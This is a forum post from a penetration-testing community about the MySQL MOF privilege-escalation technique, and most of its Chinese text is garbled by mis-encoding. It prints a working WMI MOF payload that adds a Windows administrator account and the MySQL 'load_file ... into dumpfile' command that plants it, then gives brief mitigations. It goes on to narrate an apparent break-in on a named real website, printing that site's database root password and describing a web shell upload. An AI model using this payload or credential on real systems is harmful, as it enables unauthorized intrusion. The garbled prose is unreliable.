Mysql mofÀ©Õ¹Â©¶´ÊµÀýÓë·À·¶

admin ·¢±íÓÚ 2013-1-4 19:49:49

Mysql mofÀ©Õ¹Â©¶´·À·¶·½·¨

ÍøÉÏ¹«¿ªµÄÒ»Ð©ÀûÓÃ´úÂë:

#pragma namespace(¡°\\\\.\\root\\subscription¡±)

instance of __EventFilter as $EventFilter { EventNamespace = ¡°Root\\Cimv2¡å; Name= ¡°filtP2¡å; Query = ¡°Select * From __InstanceModificationEvent ¡± ¡°Where TargetInstance Isa \¡±Win32_LocalTime\¡± ¡± ¡°And TargetInstance.Second = 5¡å; QueryLanguage = ¡°WQL¡±; }; instance of ActiveScriptEventConsumer as $Consumer { Name = ¡°consPCSV2¡å; ScriptingEngine = ¡°JScript¡±; ScriptText = ¡°var WSH = new ActiveXObject(\¡±WScript.Shell\¡±)\nWSH.run(\¡±net.exe user admin admin /add\¡±)¡±; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };

Á¬½ÓmysqlÊý¾Ý¿âºóÖ´ÐÐ£º select load_file(¡®C:\\RECYCLER\\nullevt.mof¡¯) into dumpfile ¡®c:/windows/system32/wbem/mof/nullevt.mof¡¯;
´ÓÉÏÃæ´úÂëÀ´¿´µÃ³ö½â¾ö°ì·¨£º

1¡¢mysqlÓÃ»§È¨ÏÞ¿ØÖÆ£¬½ûÖ¹ ¡°load_file¡±¡¢¡±dumpfile¡±µÈº¯Êý

2¡¢½ûÖ¹Ê¹ÓÃ¡±WScript.Shel¡±×é¼þ

3¡¢Ä¿Â¼È¨ÏÞc:/windows/system32/wbem/mof/ É¾³ýÄÚÖÃÌØÊâ×éCREATOR OWNER

µ±È»ÉÏÃæÊÇÍøÉÏËµµÄ ¸Ð¾õÐèÒªµÄÈ¨ÏÞºÜ´ó ±ÈÈç root »¹ÓÐmysqlÍâÁ´×òÌìÅöµ½ÁË¾Í¸ø´ó¼ÒÑÝÊ¾ÏÂ

ÊÂÇéÊÇÕâÑù·¢ÉúµÄÒ»»úÓÍÔÚÂÛÌ³ÌáÎÊÎÒ¾Í¿´ÁËÏÂ ·¢ÏÖÒÑ¾ÓÐ´óÅ£¸ãÏÂÁË ËµÊÇÓÃÊÇ mysql mofÀ©Õ¹ÌáÈ¨

µ«ÊÇÐ¡²Ë·¢ÏÖÃ»ÓÐÌý¹ýÓÚÊÇ¸Ï½ôÈ¥²é×ÊÁÏÑ§Ï°¡¾ÍÓÐÁËÉÏÃæµÄÀ´×ÅÍøÉÏµÄÄÚÈÝ

¿´¶®ÁËºó¾Í¿ªÊ¼Á·ÊÖ°É

http://www.webbmw.com/config/config_ucenter.php Ò»¾ä»° a

$_config['db']['1']['dbhost'] = ¡®localhost¡¯; $_config['db']['1']['dbuser'] = ¡®root¡¯; $_config['db']['1']['dbpw'] = ¡®tfr226206¡ä; $_config['db']['1']['dbcharset'] = ¡®gbk¡¯; $_config['db']['1']['pconnect'] = ¡¯0¡ä; $_config['db']['1']['dbname'] = ¡®webbmw¡¯; $_config['db']['1']['tablepre'] = ¡®pre_¡¯; $_config['db']['common']['slave_except_table'] = ¡±; ÓÐrootÃÜÂë°¡¡£

ÓÚÊÇÖ±½ÓÓÃ²Ëµ¶¿ª¸ã

ÉÏÂíÏÈ

¼ÈÈ»ÓÐÁËÄÇÐ©ÕËºÅ Ö®ÀàµÄ ÓÚÊÇÎÒÃÇ¾ÍÖ´ÐÐ°É¡¡.

Ð¡Ð¡µÄËµÏÂ

ÔÚÕâÀïµÚ1´ÎÖ´ÐÐÎ´³É¹¦ ÔÒòÎ´Öª

ÎÒ¾Í²ÂÏëÊÇ·ñÊÇÒòÎªÎÒÃÇÖ´ÐÐµÄ´úÂëÓÐÎÊÌâ ÓÚÊÇÎÒ¾ÍÈ¥ÎÒwooyunÕÒµÄ´úÂë¡£

#pragma namespace(¡°\\\\.\\root\\subscription¡±)

instance of __EventFilter as $EventFilter { EventNamespace = ¡°Root\\Cimv2¡å; Name= ¡°filtP2¡å; Query = ¡°Select * From __InstanceModificationEvent ¡± ¡°Where TargetInstance Isa \¡±Win32_LocalTime\¡± ¡± ¡°And TargetInstance.Second = 5¡å; QueryLanguage = ¡°WQL¡±; }; instance of ActiveScriptEventConsumer as $Consumer { Name = ¡°consPCSV2¡å; ScriptingEngine = ¡°JScript¡±; ScriptText = ¡°var WSH = new ActiveXObject(\¡±WScript.Shell\¡±)\nWSH.run(\¡±net.exe user test test /add\¡±)¡±; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };

ÎÒÊÇ½«ÎÄ¼þ·Åµ½C:\WINDOWS\temp\1.mof

ËùÒÔÎÒÃÇ¾Í¸ÄÏÂÖ´ÐÐµÄ´úÂë

select load_file(¡®C:\WINDOWS\temp\1.mof¡®) into dumpfile ¡®c:/windows/system32/wbem/mof/nullevt.mof¡¯;

µ«ÊÇ Äã»á·¢ÏÖÕËºÅ»¹ÊÇÃ»ÓÐÌÉÔÚÄÇÀï¡£¡£

ÓÚÊÇÎÒ¾Í¸Ð¾õµ°ÌÛ

¾ÍÈ¥Ò»¸öÒ»¸öÈ¥Ö´ÐÐ µ«ÊÇÖ´ÐÐµ½µÚ2¸ö mysqlÊ±¾Í³É¹¦ÁË¡¡¡

µ«ÊÇÆäËû¿â¾ù²»³É¹¦¡

ÎÒ¾ÍºÜ·Ñ½âÑ½ µ½µ×ÎªÊ²Ã´²»³É¹¦Çó´óÅ£½â´ð¡

Ò³: [1]

ÖÐ¹úÍøÂçÉøÍ¸²âÊÔÁªÃË's Archiver

Mysql mofÀ©Õ¹Â©¶´ÊµÀýÓë·À·¶